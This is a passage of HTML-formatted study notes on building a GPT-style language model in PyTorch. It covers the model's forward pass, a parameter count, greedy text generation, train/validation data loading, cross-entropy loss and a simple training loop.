             <span class="o">*</span><span class="p">[</span><span class="n">TransformerBlock</span><span class="p">(</span><span class="n">cfg</span><span class="p">)</span> <span class="k">for</span> <span class="n">_</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="n">cfg</span><span class="p">[</span><span class="s">"n_layers"</span><span class="p">])])</span>
            
         <span class="bp">self</span><span class="p">.</span><span class="n">final_norm</span> <span class="o">=</span> <span class="n">LayerNorm</span><span class="p">(</span><span class="n">cfg</span><span class="p">[</span><span class="s">"emb_dim"</span><span class="p">])</span>
         <span class="bp">self</span><span class="p">.</span><span class="n">out_head</span> <span class="o">=</span> <span class="n">nn</span><span class="p">.</span><span class="n">Linear</span><span class="p">(</span>
             <span class="n">cfg</span><span class="p">[</span><span class="s">"emb_dim"</span><span class="p">],</span> <span class="n">cfg</span><span class="p">[</span><span class="s">"vocab_size"</span><span class="p">],</span> <span class="n">bias</span><span class="o">=</span><span class="bp">False</span>
         <span class="p">)</span>
    
     <span class="k">def</span> <span class="nf">forward</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">in_idx</span><span class="p">):</span>
         <span class="n">batch_size</span><span class="p">,</span> <span class="n">seq_len</span> <span class="o">=</span> <span class="n">in_idx</span><span class="p">.</span><span class="n">shape</span>
         <span class="n">tok_embeds</span> <span class="o">=</span> <span class="bp">self</span><span class="p">.</span><span class="n">tok_emb</span><span class="p">(</span><span class="n">in_idx</span><span class="p">)</span>
         <span class="n">pos_embeds</span> <span class="o">=</span> <span class="bp">self</span><span class="p">.</span><span class="n">pos_emb</span><span class="p">(</span><span class="n">torch</span><span class="p">.</span><span class="n">arange</span><span class="p">(</span><span class="n">seq_len</span><span class="p">,</span> <span class="n">device</span><span class="o">=</span><span class="n">in_idx</span><span class="p">.</span><span class="n">device</span><span class="p">))</span>
         <span class="n">x</span> <span class="o">=</span> <span class="n">tok_embeds</span> <span class="o">+</span> <span class="n">pos_embeds</span>  <span class="c1"># Shape [batch_size, num_tokens, emb_size]
</span>         <span class="n">x</span> <span class="o">=</span> <span class="bp">self</span><span class="p">.</span><span class="n">drop_emb</span><span class="p">(</span><span class="n">x</span><span class="p">)</span>
         <span class="n">x</span> <span class="o">=</span> <span class="bp">self</span><span class="p">.</span><span class="n">trf_blocks</span><span class="p">(</span><span class="n">x</span><span class="p">)</span>
         <span class="n">x</span> <span class="o">=</span> <span class="bp">self</span><span class="p">.</span><span class="n">final_norm</span><span class="p">(</span><span class="n">x</span><span class="p">)</span>
         <span class="n">logits</span> <span class="o">=</span> <span class="bp">self</span><span class="p">.</span><span class="n">out_head</span><span class="p">(</span><span class="n">x</span><span class="p">)</span>
         <span class="k">return</span> <span class="n">logits</span>
</code></pre></div>    </div>
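
    <p>As a rough check on the 124 million figure, the parameters of <code class="language-plaintext highlighter-rouge">GPTModel</code> can be counted by hand. This is a sketch under stated assumptions: the configuration values are those of GPT-2 small, which the notes above do not list, and the attention and feed-forward layouts are assumed because <code class="language-plaintext highlighter-rouge">MultiHeadAttention</code> and <code class="language-plaintext highlighter-rouge">FeedForward</code> are not shown here.</p>

    <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code># Assumed GPT-2 small configuration (values are not given in the notes above)
cfg = {"vocab_size": 50257, "context_length": 1024, "emb_dim": 768, "n_layers": 12}

d = cfg["emb_dim"]
tok_emb = cfg["vocab_size"] * d
pos_emb = cfg["context_length"] * d

# Per Transformer block, assuming bias-free query/key/value projections, an output
# projection with bias, and a feed-forward network that expands to 4 * emb_dim
attention = 3 * d * d + (d * d + d)
feed_forward = (d * 4 * d + 4 * d) + (4 * d * d + d)
layer_norms = 2 * (2 * d)  # two LayerNorm modules, each with scale and shift
block = attention + feed_forward + layer_norms

final_norm = 2 * d
out_head = d * cfg["vocab_size"]  # bias=False, as in GPTModel

total = tok_emb + pos_emb + cfg["n_layers"] * block + final_norm + out_head
tied_total = total - out_head
print(f"total parameters: {total:,}")
print(f"with out_head tied to tok_emb: {tied_total:,}")
</code></pre></div>    </div>

    <p>Under these assumptions the class as written has more than 124 million parameters, because <code class="language-plaintext highlighter-rouge">out_head</code> is a separate weight matrix. The 124 million figure is reached when the output layer reuses the token embedding weights (weight tying), as the original GPT-2 does.</p>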
  </li>
  <li>
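    <p><strong>Text generation</strong>: To generate text, the GPT model's output tensors are decoded back into human-readable text, predicting one token at a time based on the given input context. An untrained GPT model produces incoherent text, which shows how important training is for generating coherent output.</p>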

    <p><img src="阅读图书Build Large Language Model\image%2019.png" alt="阅读图书Build Large Language Model\image.png" /></p>

    <p><img src="阅读图书Build Large Language Model\image%2020.png" alt="阅读图书Build Large Language Model\image.png" /></p>

    <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <span class="k">def</span> <span class="nf">generate_text_simple</span><span class="p">(</span><span class="n">model</span><span class="p">,</span> <span class="n">idx</span><span class="p">,</span> <span class="n">max_new_tokens</span><span class="p">,</span> <span class="n">context_size</span><span class="p">):</span>
     <span class="c1"># idx is (batch, n_tokens) array of indices in the current context
</span>     <span class="k">for</span> <span class="n">_</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="n">max_new_tokens</span><span class="p">):</span>
            
         <span class="c1"># Crop current context if it exceeds the supported context size
</span>         <span class="c1"># E.g., if LLM supports only 5 tokens, and the context size is 10
</span>         <span class="c1"># then only the last 5 tokens are used as context
</span>         <span class="n">idx_cond</span> <span class="o">=</span> <span class="n">idx</span><span class="p">[:,</span> <span class="o">-</span><span class="n">context_size</span><span class="p">:]</span>
            
         <span class="c1"># Get the predictions
</span>         <span class="k">with</span> <span class="n">torch</span><span class="p">.</span><span class="n">no_grad</span><span class="p">():</span>
             <span class="n">logits</span> <span class="o">=</span> <span class="n">model</span><span class="p">(</span><span class="n">idx_cond</span><span class="p">)</span>
            
         <span class="c1"># Focus only on the last time step
</span>         <span class="c1"># (batch, n_tokens, vocab_size) becomes (batch, vocab_size)
</span>         <span class="n">logits</span> <span class="o">=</span> <span class="n">logits</span><span class="p">[:,</span> <span class="o">-</span><span class="mi">1</span><span class="p">,</span> <span class="p">:]</span>  
    
         <span class="c1"># Apply softmax to get probabilities
</span>         <span class="n">probas</span> <span class="o">=</span> <span class="n">torch</span><span class="p">.</span><span class="n">softmax</span><span class="p">(</span><span class="n">logits</span><span class="p">,</span> <span class="n">dim</span><span class="o">=-</span><span class="mi">1</span><span class="p">)</span>  <span class="c1"># (batch, vocab_size)
</span>    
         <span class="c1"># Get the idx of the vocab entry with the highest probability value
</span>         <span class="n">idx_next</span> <span class="o">=</span> <span class="n">torch</span><span class="p">.</span><span class="n">argmax</span><span class="p">(</span><span class="n">probas</span><span class="p">,</span> <span class="n">dim</span><span class="o">=-</span><span class="mi">1</span><span class="p">,</span> <span class="n">keepdim</span><span class="o">=</span><span class="bp">True</span><span class="p">)</span>  <span class="c1"># (batch, 1)
</span>    
         <span class="c1"># Append sampled index to the running sequence
</span>         <span class="n">idx</span> <span class="o">=</span> <span class="n">torch</span><span class="p">.</span><span class="n">cat</span><span class="p">((</span><span class="n">idx</span><span class="p">,</span> <span class="n">idx_next</span><span class="p">),</span> <span class="n">dim</span><span class="o">=</span><span class="mi">1</span><span class="p">)</span>  <span class="c1"># (batch, n_tokens+1)
</span>    
     <span class="k">return</span> <span class="n">idx</span>
     
 <span class="n">start_context</span> <span class="o">=</span> <span class="s">"Hello, I am"</span>
    
 <span class="n">encoded</span> <span class="o">=</span> <span class="n">tokenizer</span><span class="p">.</span><span class="n">encode</span><span class="p">(</span><span class="n">start_context</span><span class="p">)</span>
 <span class="k">print</span><span class="p">(</span><span class="s">"encoded:"</span><span class="p">,</span> <span class="n">encoded</span><span class="p">)</span>
    
 <span class="n">encoded_tensor</span> <span class="o">=</span> <span class="n">torch</span><span class="p">.</span><span class="n">tensor</span><span class="p">(</span><span class="n">encoded</span><span class="p">).</span><span class="n">unsqueeze</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span>
 <span class="k">print</span><span class="p">(</span><span class="s">"encoded_tensor.shape:"</span><span class="p">,</span> <span class="n">encoded_tensor</span><span class="p">.</span><span class="n">shape</span><span class="p">)</span>
 <span class="n">model</span><span class="p">.</span><span class="nb">eval</span><span class="p">()</span> <span class="c1"># disable dropout
</span>    
 <span class="n">out</span> <span class="o">=</span> <span class="n">generate_text_simple</span><span class="p">(</span>
     <span class="n">model</span><span class="o">=</span><span class="n">model</span><span class="p">,</span>
     <span class="n">idx</span><span class="o">=</span><span class="n">encoded_tensor</span><span class="p">,</span> 
     <span class="n">max_new_tokens</span><span class="o">=</span><span class="mi">6</span><span class="p">,</span> 
     <span class="n">context_size</span><span class="o">=</span><span class="n">GPT_CONFIG_124M</span><span class="p">[</span><span class="s">"context_length"</span><span class="p">]</span>
 <span class="p">)</span>
    
 <span class="k">print</span><span class="p">(</span><span class="s">"Output:"</span><span class="p">,</span> <span class="n">out</span><span class="p">)</span>
 <span class="k">print</span><span class="p">(</span><span class="s">"Output length:"</span><span class="p">,</span> <span class="nb">len</span><span class="p">(</span><span class="n">out</span><span class="p">[</span><span class="mi">0</span><span class="p">]))</span>
 <span class="n">decoded_text</span> <span class="o">=</span> <span class="n">tokenizer</span><span class="p">.</span><span class="n">decode</span><span class="p">(</span><span class="n">out</span><span class="p">.</span><span class="n">squeeze</span><span class="p">(</span><span class="mi">0</span><span class="p">).</span><span class="n">tolist</span><span class="p">())</span>
 <span class="k">print</span><span class="p">(</span><span class="n">decoded_text</span><span class="p">)</span>
 <span class="c1"># Output: Hello, I am Featureiman Byeswickattribute argue</span>
</code></pre></div>    </div>

    <p><img src="阅读图书Build Large Language Model\image%2021.png" alt="阅读图书Build Large Language Model\image.png" /></p>
  </li>
</ol>
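<p>The generation loop above can be traced without PyTorch. The following is a minimal sketch in plain Python, not the book's implementation: <code>greedy_generate</code>, <code>toy_model</code>, and the 4-token vocabulary are hypothetical stand-ins chosen only to show the crop, softmax, argmax, append cycle.</p>

```python
import math

def softmax(logits):
    """Numerically stable softmax over a list of floats."""
    peak = max(logits)
    exps = [math.exp(x - peak) for x in logits]
    total = sum(exps)
    return [e / total for e in exps]

def greedy_generate(next_logits, token_ids, max_new_tokens, context_size):
    """Append max_new_tokens greedily chosen token IDs to token_ids.

    next_logits is a hypothetical stand-in for the model: it maps a list of
    context token IDs to one logit per vocabulary entry for the next token.
    """
    token_ids = list(token_ids)
    for _ in range(max_new_tokens):
        context = token_ids[-context_size:]   # crop to the supported window
        probas = softmax(next_logits(context))
        # argmax: index of the most probable vocabulary entry
        next_id = max(range(len(probas)), key=probas.__getitem__)
        token_ids.append(next_id)
    return token_ids

def toy_model(context):
    """Toy 'model' over a 4-token vocabulary: favors (last token + 1) mod 4."""
    favored = (context[-1] + 1) % 4
    return [5.0 if i == favored else 0.0 for i in range(4)]

print(greedy_generate(toy_model, [0], max_new_tokens=6, context_size=2))
# prints [0, 1, 2, 3, 0, 1, 2]
```

<p>Because softmax preserves the ordering of the logits, taking the argmax of the raw logits would select the same token; the softmax step mainly makes the probabilities explicit.</p>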

<h1 id="第5章-pretraining-on-unlabeled-data">Chapter 5: Pretraining on Unlabeled Data</h1>

<p><img src="阅读图书Build Large Language Model\image%2022.png" alt="阅读图书Build Large Language Model\image.png" /></p>

<h2 id="evaluating-generative-text-models">Evaluating generative text models</h2>

<p><img src="阅读图书Build Large Language Model\image%2023.png" alt="阅读图书Build Large Language Model\image.png" /></p>

<p><img src="阅读图书Build Large Language Model\image%2024.png" alt="阅读图书Build Large Language Model\image.png" /></p>

<p><img src="阅读图书Build Large Language Model\image%2025.png" alt="阅读图书Build Large Language Model\image.png" /></p>

<p><img src="阅读图书Build Large Language Model\image%2026.png" alt="阅读图书Build Large Language Model\image.png" /></p>

<p><img src="阅读图书Build Large Language Model\image%2027.png" alt="阅读图书Build Large Language Model\image.png" /></p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">os</span>
<span class="kn">import</span> <span class="nn">urllib.request</span>

<span class="kn">import</span> <span class="nn">torch</span>

<span class="n">file_path</span> <span class="o">=</span> <span class="s">"the-verdict.txt"</span>
<span class="n">url</span> <span class="o">=</span> <span class="s">"https://raw.githubusercontent.com/rasbt/LLMs-from-scratch/main/ch02/01_main-chapter-code/the-verdict.txt"</span>

<span class="k">if</span> <span class="ow">not</span> <span class="n">os</span><span class="p">.</span><span class="n">path</span><span class="p">.</span><span class="n">exists</span><span class="p">(</span><span class="n">file_path</span><span class="p">):</span>
    <span class="k">with</span> <span class="n">urllib</span><span class="p">.</span><span class="n">request</span><span class="p">.</span><span class="n">urlopen</span><span class="p">(</span><span class="n">url</span><span class="p">)</span> <span class="k">as</span> <span class="n">response</span><span class="p">:</span>
        <span class="n">text_data</span> <span class="o">=</span> <span class="n">response</span><span class="p">.</span><span class="n">read</span><span class="p">().</span><span class="n">decode</span><span class="p">(</span><span class="s">'utf-8'</span><span class="p">)</span>
    <span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="n">file_path</span><span class="p">,</span> <span class="s">"w"</span><span class="p">,</span> <span class="n">encoding</span><span class="o">=</span><span class="s">"utf-8"</span><span class="p">)</span> <span class="k">as</span> <span class="nb">file</span><span class="p">:</span>
        <span class="nb">file</span><span class="p">.</span><span class="n">write</span><span class="p">(</span><span class="n">text_data</span><span class="p">)</span>
<span class="k">else</span><span class="p">:</span>
    <span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="n">file_path</span><span class="p">,</span> <span class="s">"r"</span><span class="p">,</span> <span class="n">encoding</span><span class="o">=</span><span class="s">"utf-8"</span><span class="p">)</span> <span class="k">as</span> <span class="nb">file</span><span class="p">:</span>
        <span class="n">text_data</span> <span class="o">=</span> <span class="nb">file</span><span class="p">.</span><span class="n">read</span><span class="p">()</span>
<span class="kn">from</span> <span class="nn">previous_chapters</span> <span class="kn">import</span> <span class="n">create_dataloader_v1</span>

<span class="c1"># Train/validation ratio
</span><span class="n">train_ratio</span> <span class="o">=</span> <span class="mf">0.90</span>
<span class="n">split_idx</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="n">train_ratio</span> <span class="o">*</span> <span class="nb">len</span><span class="p">(</span><span class="n">text_data</span><span class="p">))</span>
<span class="n">train_data</span> <span class="o">=</span> <span class="n">text_data</span><span class="p">[:</span><span class="n">split_idx</span><span class="p">]</span>
<span class="n">val_data</span> <span class="o">=</span> <span class="n">text_data</span><span class="p">[</span><span class="n">split_idx</span><span class="p">:]</span>

<span class="n">torch</span><span class="p">.</span><span class="n">manual_seed</span><span class="p">(</span><span class="mi">123</span><span class="p">)</span>

<span class="n">train_loader</span> <span class="o">=</span> <span class="n">create_dataloader_v1</span><span class="p">(</span>
    <span class="n">train_data</span><span class="p">,</span>
    <span class="n">batch_size</span><span class="o">=</span><span class="mi">2</span><span class="p">,</span>
    <span class="n">max_length</span><span class="o">=</span><span class="n">GPT_CONFIG_124M</span><span class="p">[</span><span class="s">"context_length"</span><span class="p">],</span>
    <span class="n">stride</span><span class="o">=</span><span class="n">GPT_CONFIG_124M</span><span class="p">[</span><span class="s">"context_length"</span><span class="p">],</span>
    <span class="n">drop_last</span><span class="o">=</span><span class="bp">True</span><span class="p">,</span>
    <span class="n">shuffle</span><span class="o">=</span><span class="bp">True</span><span class="p">,</span>
    <span class="n">num_workers</span><span class="o">=</span><span class="mi">0</span>
<span class="p">)</span>

<span class="n">val_loader</span> <span class="o">=</span> <span class="n">create_dataloader_v1</span><span class="p">(</span>
    <span class="n">val_data</span><span class="p">,</span>
    <span class="n">batch_size</span><span class="o">=</span><span class="mi">2</span><span class="p">,</span>
    <span class="n">max_length</span><span class="o">=</span><span class="n">GPT_CONFIG_124M</span><span class="p">[</span><span class="s">"context_length"</span><span class="p">],</span>
    <span class="n">stride</span><span class="o">=</span><span class="n">GPT_CONFIG_124M</span><span class="p">[</span><span class="s">"context_length"</span><span class="p">],</span>
    <span class="n">drop_last</span><span class="o">=</span><span class="bp">False</span><span class="p">,</span>
    <span class="n">shuffle</span><span class="o">=</span><span class="bp">False</span><span class="p">,</span>
    <span class="n">num_workers</span><span class="o">=</span><span class="mi">0</span>
<span class="p">)</span>
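<span class="c1"># Sanity check: each split needs at least one full context window of tokens
# (assumes the `tokenizer` used earlier in these notes)
</span><span class="n">total_tokens</span> <span class="o">=</span> <span class="nb">len</span><span class="p">(</span><span class="n">tokenizer</span><span class="p">.</span><span class="n">encode</span><span class="p">(</span><span class="n">text_data</span><span class="p">))</span>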
<span class="k">if</span> <span class="n">total_tokens</span> <span class="o">*</span> <span class="p">(</span><span class="n">train_ratio</span><span class="p">)</span> <span class="o">&lt;</span> <span class="n">GPT_CONFIG_124M</span><span class="p">[</span><span class="s">"context_length"</span><span class="p">]:</span>
    <span class="k">print</span><span class="p">(</span><span class="s">"Not enough tokens for the training loader. "</span>
          <span class="s">"Try to lower the `GPT_CONFIG_124M['context_length']` or "</span>
          <span class="s">"increase the `train_ratio`"</span><span class="p">)</span>

<span class="k">if</span> <span class="n">total_tokens</span> <span class="o">*</span> <span class="p">(</span><span class="mi">1</span><span class="o">-</span><span class="n">train_ratio</span><span class="p">)</span> <span class="o">&lt;</span> <span class="n">GPT_CONFIG_124M</span><span class="p">[</span><span class="s">"context_length"</span><span class="p">]:</span>
    <span class="k">print</span><span class="p">(</span><span class="s">"Not enough tokens for the validation loader. "</span>
          <span class="s">"Try to lower the `GPT_CONFIG_124M['context_length']` or "</span>
          <span class="s">"decrease the `train_ratio`"</span><span class="p">)</span>

<span class="k">def</span> <span class="nf">calc_loss_batch</span><span class="p">(</span><span class="n">input_batch</span><span class="p">,</span> <span class="n">target_batch</span><span class="p">,</span> <span class="n">model</span><span class="p">,</span> <span class="n">device</span><span class="p">):</span>
    <span class="n">input_batch</span><span class="p">,</span> <span class="n">target_batch</span> <span class="o">=</span> <span class="n">input_batch</span><span class="p">.</span><span class="n">to</span><span class="p">(</span><span class="n">device</span><span class="p">),</span> <span class="n">target_batch</span><span class="p">.</span><span class="n">to</span><span class="p">(</span><span class="n">device</span><span class="p">)</span>
    <span class="n">logits</span> <span class="o">=</span> <span class="n">model</span><span class="p">(</span><span class="n">input_batch</span><span class="p">)</span>
    <span class="n">loss</span> <span class="o">=</span> <span class="n">torch</span><span class="p">.</span><span class="n">nn</span><span class="p">.</span><span class="n">functional</span><span class="p">.</span><span class="n">cross_entropy</span><span class="p">(</span><span class="n">logits</span><span class="p">.</span><span class="n">flatten</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="mi">1</span><span class="p">),</span> <span class="n">target_batch</span><span class="p">.</span><span class="n">flatten</span><span class="p">())</span>
    <span class="k">return</span> <span class="n">loss</span>

<span class="k">def</span> <span class="nf">calc_loss_loader</span><span class="p">(</span><span class="n">data_loader</span><span class="p">,</span> <span class="n">model</span><span class="p">,</span> <span class="n">device</span><span class="p">,</span> <span class="n">num_batches</span><span class="o">=</span><span class="bp">None</span><span class="p">):</span>
    <span class="n">total_loss</span> <span class="o">=</span> <span class="mf">0.</span>
    <span class="k">if</span> <span class="nb">len</span><span class="p">(</span><span class="n">data_loader</span><span class="p">)</span> <span class="o">==</span> <span class="mi">0</span><span class="p">:</span>
        <span class="k">return</span> <span class="nb">float</span><span class="p">(</span><span class="s">"nan"</span><span class="p">)</span>
    <span class="k">elif</span> <span class="n">num_batches</span> <span class="ow">is</span> <span class="bp">None</span><span class="p">:</span>
        <span class="n">num_batches</span> <span class="o">=</span> <span class="nb">len</span><span class="p">(</span><span class="n">data_loader</span><span class="p">)</span>
    <span class="k">else</span><span class="p">:</span>
        <span class="c1"># Reduce the number of batches to match the total number of batches in the data loader
</span>        <span class="c1"># if num_batches exceeds the number of batches in the data loader
</span>        <span class="n">num_batches</span> <span class="o">=</span> <span class="nb">min</span><span class="p">(</span><span class="n">num_batches</span><span class="p">,</span> <span class="nb">len</span><span class="p">(</span><span class="n">data_loader</span><span class="p">))</span>
    <span class="k">for</span> <span class="n">i</span><span class="p">,</span> <span class="p">(</span><span class="n">input_batch</span><span class="p">,</span> <span class="n">target_batch</span><span class="p">)</span> <span class="ow">in</span> <span class="nb">enumerate</span><span class="p">(</span><span class="n">data_loader</span><span class="p">):</span>
        <span class="k">if</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">num_batches</span><span class="p">:</span>
            <span class="n">loss</span> <span class="o">=</span> <span class="n">calc_loss_batch</span><span class="p">(</span><span class="n">input_batch</span><span class="p">,</span> <span class="n">target_batch</span><span class="p">,</span> <span class="n">model</span><span class="p">,</span> <span class="n">device</span><span class="p">)</span>
            <span class="n">total_loss</span> <span class="o">+=</span> <span class="n">loss</span><span class="p">.</span><span class="n">item</span><span class="p">()</span>
        <span class="k">else</span><span class="p">:</span>
            <span class="k">break</span>
    <span class="k">return</span> <span class="n">total_loss</span> <span class="o">/</span> <span class="n">num_batches</span>
    
<span class="n">device</span> <span class="o">=</span> <span class="n">torch</span><span class="p">.</span><span class="n">device</span><span class="p">(</span><span class="s">"cuda"</span> <span class="k">if</span> <span class="n">torch</span><span class="p">.</span><span class="n">cuda</span><span class="p">.</span><span class="n">is_available</span><span class="p">()</span> <span class="k">else</span> <span class="s">"cpu"</span><span class="p">)</span>

<span class="c1"># Note:
# Uncommenting the following lines will allow the code to run on Apple Silicon chips, if applicable,
# which is approximately 2x faster than on an Apple CPU (as measured on an M3 MacBook Air).
# However, the resulting loss values may be slightly different.
</span>
<span class="c1">#if torch.cuda.is_available():
#    device = torch.device("cuda")
#elif torch.backends.mps.is_available():
#    device = torch.device("mps")
#else:
#    device = torch.device("cpu")
#
# print(f"Using {device} device.")
</span>
<span class="n">model</span><span class="p">.</span><span class="n">to</span><span class="p">(</span><span class="n">device</span><span class="p">)</span> <span class="c1"># no assignment model = model.to(device) necessary for nn.Module classes
</span>
<span class="n">torch</span><span class="p">.</span><span class="n">manual_seed</span><span class="p">(</span><span class="mi">123</span><span class="p">)</span> <span class="c1"># For reproducibility due to the shuffling in the data loader
</span>
<span class="k">with</span> <span class="n">torch</span><span class="p">.</span><span class="n">no_grad</span><span class="p">():</span> <span class="c1"># Disable gradient tracking for efficiency because we are not training, yet
</span>    <span class="n">train_loss</span> <span class="o">=</span> <span class="n">calc_loss_loader</span><span class="p">(</span><span class="n">train_loader</span><span class="p">,</span> <span class="n">model</span><span class="p">,</span> <span class="n">device</span><span class="p">)</span>
    <span class="n">val_loss</span> <span class="o">=</span> <span class="n">calc_loss_loader</span><span class="p">(</span><span class="n">val_loader</span><span class="p">,</span> <span class="n">model</span><span class="p">,</span> <span class="n">device</span><span class="p">)</span>

<span class="k">print</span><span class="p">(</span><span class="s">"Training loss:"</span><span class="p">,</span> <span class="n">train_loss</span><span class="p">)</span>
<span class="k">print</span><span class="p">(</span><span class="s">"Validation loss:"</span><span class="p">,</span> <span class="n">val_loss</span><span class="p">)</span>
</code></pre></div></div>
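<p>To make the loss value concrete, here is a small dependency-free sketch of what the cross-entropy call in <code>calc_loss_batch</code> computes once the batch and sequence dimensions are flattened. The <code>cross_entropy</code> function below is a hypothetical re-implementation for illustration, and the vocabulary size of 50257 (GPT-2) is an assumption, since the configuration is not shown in this section.</p>

```python
import math

def cross_entropy(logits_rows, targets):
    """Mean negative log-likelihood of the target token IDs.

    logits_rows: one list of logits per token position (batch and sequence
    dimensions already flattened together); targets: one token ID per row.
    """
    total = 0.0
    for logits, target in zip(logits_rows, targets):
        peak = max(logits)
        # log of the softmax denominator, computed stably
        log_norm = peak + math.log(sum(math.exp(x - peak) for x in logits))
        total += log_norm - logits[target]   # equals -log softmax(logits)[target]
    return total / len(targets)

# A model that spreads probability evenly over a vocabulary of size V
# has loss ln(V). 50257 is the GPT-2 vocabulary size (assumed here).
vocab_size = 50257
uniform_loss = cross_entropy([[0.0] * vocab_size], [0])
print(round(uniform_loss, 3))          # ln(50257), roughly 10.825
print(round(math.exp(uniform_loss)))   # perplexity: 50257
```

<p>A freshly initialized model is therefore expected to report training and validation losses in the neighborhood of this value; losses well below it indicate that the model has learned something about the text.</p>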

<h2 id="训练模型">Training the model</h2>

<p><img src="阅读图书Build Large Language Model\image%2028.png" alt="阅读图书Build Large Language Model\image.png" /></p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">def</span> <span class="nf">train_model_simple</span><span class="p">(</span><span class="n">model</span><span class="p">,</span> <span class="n">train_loader</span><span class="p">,</span> <span class="n">val_loader</span><span class="p">,</span> <span class="n">optimizer</span><span class="p">,</span> <span class="n">device</span><span class="p">,</span> <span class="n">num_epochs</span><span class="p">,</span>
                       <span class="n">eval_freq</span><span class="p">,</span> <span class="n">eval_iter</span><span class="p">,</span> <span class="n">start_context</span><span class="p">,</span> <span class="n">tokenizer</span><span class="p">):</span>
    <span class="c1"># Initialize lists to track losses and tokens seen
</span>    <span class="n">train_losses</span><span class="p">,</span> <span class="n">val_losses</span><span class="p">,</span> <span class="n">track_tokens_seen</span> <span class="o">=</span> <span class="p">[],</span> <span class="p">[],</span> <span class="p">[]</span>
    <span class="n">tokens_seen</span><span class="p">,</span> <span class="n">global_step</span> <span class="o">=</span> <span class="mi">0</span><span class="p">,</span> <span class="o">-</span><span class="mi">1</span>

    <span class="c1"># Main training loop
</span>    <span class="k">for</span> <span class="n">epoch</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="n">num_epochs</span><span class="p">):</span>
        <span class="n">model</span><span class="p">.</span><span class="n">train</span><span class="p">()</span>  <span class="c1"># Set model to training mode
</span>        
        <span class="k">for</span> <span class="n">input_batch</span><span class="p">,</span> <span class="n">target_batch</span> <span class="ow">in</span> <span class="n">train_loader</span><span class="p">:</span>
            <span class="n">optimizer</span><span class="p">.</span><span class="n">zero_grad</span><span class="p">()</span> <span class="c1"># Reset loss gradients from previous batch iteration
</span>            <span class="n">loss</span> <span class="o">=</span> <span class="n">calc_loss_batch</span><span class="p">(</span><span class="n">input_batch</span><span class="p">,</span> <span class="n">target_batch</span><span class="p">,</span> <span class="n">model</span><span class="p">,</span> <span class="n">device</span><span class="p">)</span>
            <span class="n">loss</span><span class="p">.</span><span class="n">backward</span><span class="p">()</span> <span class="c1"># Calculate loss gradients
</span>            <span class="n">optimizer</span><span class="p">.</span><span class="n">step</span><span class="p">()</span> <span class="c1"># Update model weights using loss gradients
</span>            <span class="n">tokens_seen</span> <span class="o">+=</span> <span class="n">input_batch</span><span class="p">.</span><span class="n">numel</span><span class="p">()</span>
            <span class="n">global_step</span> <span class="o">+=</span> <span class="mi">1</span>

            <span class="c1"># Optional evaluation step
</span>            <span class="k">if</span> <span class="n">global_step</span> <span class="o">%</span> <span class="n">eval_freq</span> <span class="o">==</span> <span class="mi">0</span><span class="p">:</span>
                <span class="n">train_loss</span><span class="p">,</span> <span class="n">val_loss</span> <span class="o">=</span> <span class="n">evaluate_model</span><span class="p">(</span>
                    <span class="n">model</span><span class="p">,</span> <span class="n">train_loader</span><span class="p">,</span> <span class="n">val_loader</span><span class="p">,</span> <span class="n">device</span><span class="p">,</span> <span class="n">eval_iter</span><span class="p">)</span>
                <span class="n">train_losses</span><span class="p">.</span><span class="n">append</span><span class="p">(</span><span class="n">train_loss</span><span class="p">)</span>
                <span class="n">val_losses</span><span class="p">.</span><span class="n">append</span><span class="p">(</span><span class="n">val_loss</span><span class="p">)</span>
                <span class="n">track_tokens_seen</span><span class="p">.</span><span class="n">append</span><span class="p">(</span><span class="n">tokens_seen</span><span class="p">)</span>
                <span class="k">print</span><span class="p">(</span><span class="sa">f</span><span class="s">"Ep </span><span class="si">{</span><span class="n">epoch</span><span class="o">+</span><span class="mi">1</span><span class="si">}</span><span class="s"> (Step </span><span class="si">{</span><span class="n">global_step</span><span class="si">:</span><span class="mi">06</span><span class="n">d</span><span class="si">}</span><span class="s">): "</span>
                      <span class="sa">f</span><span class="s">"Train loss </span><span class="si">{</span><span class="n">train_loss</span><span class="si">:</span><span class="p">.</span><span class="mi">3</span><span class="n">f</span><span class="si">}</span><span class="s">, Val loss </span><span class="si">{</span><span class="n">val_loss</span><span class="si">:</span><span class="p">.</span><span class="mi">3</span><span class="n">f</span><span class="si">}</span><span class="s">"</span><span class="p">)</span>

        <span class="c1"># Print a sample text after each epoch
</span>        <span class="n">generate_and_print_sample</span><span class="p">(</span>
            <span class="n">model</span><span class="p">,</span> <span class="n">tokenizer</span><span class="p">,</span> <span class="n">device</span><span class="p">,</span> <span class="n">start_context</span>
        <span class="p">)</span>

    <span class="k">return</span> <span class="n">train_losses</span><span class="p">,</span> <span class="n">val_losses</span><span class="p">,</span> <span class="n">track_tokens_seen</span>

<span class="k">def</span> <span class="nf">evaluate_model</span><span class="p">(</span><span class="n">model</span><span class="p">,</span> <span class="n">train_loader</span><span class="p">,</span> <span class="n">val_loader</span><span class="p">,</span> <span class="n">device</span><span class="p">,</span> <span class="n">eval_iter</span><span class="p">):</span>
    <span class="n">model</span><span class="p">.</span><span class="nb">eval</span><span class="p">()</span>
    <span class="k">with</span> <span class="n">torch</span><span class="p">.</span><span class="n">no_grad</span><span class="p">():</span>
        <span class="n">train_loss</span> <span class="o">=</span> <span class="n">calc_loss_loader</span><span class="p">(</span><span class="n">train_loader</span><span class="p">,</span> <span class="n">model</span><span class="p">,</span> <span class="n">device</span><span class="p">,</span> <span class="n">num_batches</span><span class="o">=</span><span class="n">eval_iter</span><span class="p">)</span>
        <span class="n">val_loss</span> <span class="o">=</span> <span class="n">calc_loss_loader</span><span class="p">(</span><span class="n">val_loader</span><span class="p">,</span> <span class="n">model</span><span class="p">,</span> <span class="n">device</span><span class="p">,</span> <span class="n">num_batches</span><span class="o">=</span><span class="n">eval_iter</span><span class="p">)</span>
